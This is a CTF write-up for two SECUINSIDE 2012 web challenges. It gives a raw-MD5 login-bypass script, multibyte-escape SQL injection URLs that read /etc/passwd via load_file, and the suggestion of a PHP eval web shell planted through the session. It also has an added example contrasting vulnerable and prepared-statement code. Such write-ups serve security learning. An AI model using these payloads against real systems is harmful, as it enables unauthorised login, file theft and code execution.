SECUINSIDE 2012 prequals CTF – web writeup (cliph + sqlgeek)
Hello, I participated (as Tasteless) in the SECUINSIDE 2012 CTF prequals and really liked it because many web challenges were available. The other guys from the team were mostly missing, but I succeeded in finishing 5 of the 6 challs. Here are the writeups:
cliph: login bypass using MD5 in raw format
$mpw=md5("$_POST[ip]",true); $q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));
In PHP, md5($string, true) returns the raw 16-byte binary digest instead of the hex string, and those bytes can contain characters like ', ", = etc. The shortest usable injection is therefore an input whose raw MD5 contains '=' somewhere in it. Here is a small PHP script to find such inputs:
<?php // print every integer whose raw (binary) MD5 digest contains the substring '='
for ($i = 1; $i <= 100000000; $i++) { if (strpos(md5($i, true), "'='") !== false) echo $i . "\n"; } ?>
It gave me a few numbers; I used 2998869 to log in as
making the query
select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'
This makes the condition true, because in MySQL 'a'='b'='c' evaluates to true: ('a'='b') is 0, and 0='c' is true since the non-numeric string 'c' is cast to 0. The flag was visible once you were logged in as admin. It actually required you to have at least 2147483647 gold; I guess admin had that much…
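As an added example (not the challenge's code), here is the cliph lookup pattern beside a safe version. It assumes a PDO connection $pdo and a table member(id, ip) where ip stores the MD5 of the posted ip value, as the challenge did; the function names are mine.

```php
<?php
// Added example, not the challenge's code. Assumes a PDO connection $pdo and a
// table member(id, ip) where ip holds the MD5 of the submitted ip value.

// VULNERABLE (the challenge's pattern): md5(..., true) yields 16 raw bytes that
// can contain ' " = etc., and they are interpolated straight into the SQL text,
// so a chosen "ip" value can rewrite the WHERE clause.
function lookupMemberVulnerable(PDO $pdo, string $id, string $ip): ?array {
    $mpw = md5($ip, true);
    $sql = "select * from member where id='$id' and ip='$mpw'";
    $stmt = $pdo->query($sql);
    $row = $stmt ? $stmt->fetch(PDO::FETCH_ASSOC) : false;
    return $row === false ? null : $row;
}

// SAFE: both values are bound as parameters, so the digest bytes (raw or hex)
// are never parsed as SQL. Using the hex digest also keeps the column printable.
function lookupMemberSafe(PDO $pdo, string $id, string $ip): ?array {
    $mpw = md5($ip);                       // 32-char hex, no SQL metacharacters
    $stmt = $pdo->prepare('select * from member where id = :id and ip = :ip');
    $stmt->execute([':id' => $id, ':ip' => $mpw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Quick check of the property the write-up exploits: how many small integers
// produce a raw digest containing a single quote at all (roughly 6% of inputs,
// since each of the 16 bytes has a 1/256 chance of being 0x27). Interpolating
// the raw digest is unsafe whenever this count is non-zero.
function countDigestsWithQuote(int $limit): int {
    $n = 0;
    for ($i = 1; $i <= $limit; $i++) {
        if (strpos(md5((string)$i, true), "'") !== false) {
            $n++;
        }
    }
    return $n;
}
```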
sqlgeek: this was the hardest among the web challenges. I haven't really finished it, but I was pretty close.
$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr');
if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied");
if(strlen($_GET[view])>17) exit("Access Denied");
$q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));
magic_quotes was ON, so I used the multibyte character %bf%5c in the view parameter to be able to use $_GET[stat] for the injection. So:
index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -
Now, $_SESSION[read_me]="/etc/passwd"; tells us to read /etc/passwd, so:
index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -
From there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php, which included your session and returned its values.
Now I didn't know what to do. I knew I needed to get command execution somehow, but didn't know how.
After the CTF ended, user "hvortex" said I could manipulate $_SESSION[id] due to extract($_GET);, which I hadn't seen…
I guess you could use something like $_SESSION[id]=<?php eval($_GET[cmd]); ?> and then include
and read the flag. I was wrong; here is the whole writeup: Reiners blog
This is one of the best web challenges I have encountered so far. =)